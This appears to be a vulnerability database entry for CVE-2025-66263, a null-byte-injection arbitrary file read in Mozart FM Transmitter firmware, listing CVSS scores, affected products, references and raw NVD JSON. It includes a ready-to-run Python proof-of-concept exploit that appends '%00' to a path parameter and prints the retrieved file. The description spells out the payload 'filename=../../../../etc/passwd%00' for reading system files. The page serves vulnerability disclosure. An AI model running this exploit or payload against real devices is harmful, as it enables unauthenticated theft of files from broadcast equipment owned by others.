CVE-2025-66263

Description

Unauthenticated Arbitrary File Read via Null Byte Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Null byte injection in download_setting.php allows reading arbitrary files. The `/var/tdf/download_setting.php` endpoint constructs file paths by concatenating user-controlled `$_GET['filename']` with a forced `.tgz` extension. Running on PHP 5.3.2 (pre-5.3.4), the application is vulnerable to null byte injection (%00), allowing attackers to bypass the extension restriction and traverse paths. By requesting `filename=../../../../etc/passwd%00`, the underlying C functions treat the null byte as a string terminator, ignoring the appended `.tgz` and enabling unauthenticated arbitrary file disclosure of any file readable by the web server user.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_500_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_6000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_6000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

PHP < 5.3.4 (运行环境)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-66263 PoC - Mozart FM Transmitter Null Byte Injection
# Target: /var/tdf/download_setting.php
# Vulnerability: Unauthenticated Arbitrary File Read via Null Byte Injection

def exploit(target_url, filename):
    """
    Exploit null byte injection to read arbitrary files
    """
    # Construct the exploit URL with null byte injection
    # The %00 (null byte) will terminate the string in PHP < 5.3.4
    # causing the .tgz extension to be ignored
    params = {
        'filename': filename + '%00'
    }
    
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Requesting file: {filename}")
        
        response = requests.get(target_url, params=params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved ({len(response.content)} bytes)")
            print("=" * 60)
            print(response.text[:2000])  # Print first 2000 chars
            print("=" * 60)
            return response.content
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-66263.py <target_url> ")
        print("Example: python cve-2025-66263.py http://target.com/download_setting.php /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    filename = sys.argv[2]
    
    # Common targets for enumeration
    exploit(target, filename)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66263
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66263
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66263/
[4] VulDB https://vuldb.com/cve/CVE-2025-66263
[5] https://www.abdulmhsblog.com/posts/webfmvulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66263", "sourceIdentifier": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "published": "2025-11-26T01:16:09.880", "lastModified": "2025-12-03T16:52:03.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated Arbitrary File Read via Null Byte Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Null byte injection in download_setting.php allows reading arbitrary files.\nThe `/var/tdf/download_setting.php` endpoint constructs file paths by concatenating user-controlled `$_GET['filename']` with a forced `.tgz` extension. Running on PHP 5.3.2 (pre-5.3.4), the application is vulnerable to null byte injection (%00), allowing attackers to bypass the extension restriction and traverse paths. By requesting `filename=../../../../etc/passwd%00`, the underlying C functions treat the null byte as a string terminator, ignoring the appended `.tgz` and enabling unauthenticated arbitrary file disclosure of any file readable by the web server user."}], "metrics": {"cvssMetricV40": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-158"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9F5D088-18AE-4388-83D7-66EBF03B3091"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E5427DF7-CBAB-4BB9-9175-B7EC7012EAD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "285B4AB4-1F69-445E-B2D3-A0C140B55990"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "90E84970-55F7-41CB-814E-085BACFAAA91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CD961FB-E86A-4346-9B8D-3658C7BD818F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "56699CC2-C823-4397-8C76-BC165E48D6E0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "93081491-7BD5-4AD8-B9A9-4017BD531955"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteri ... (truncated)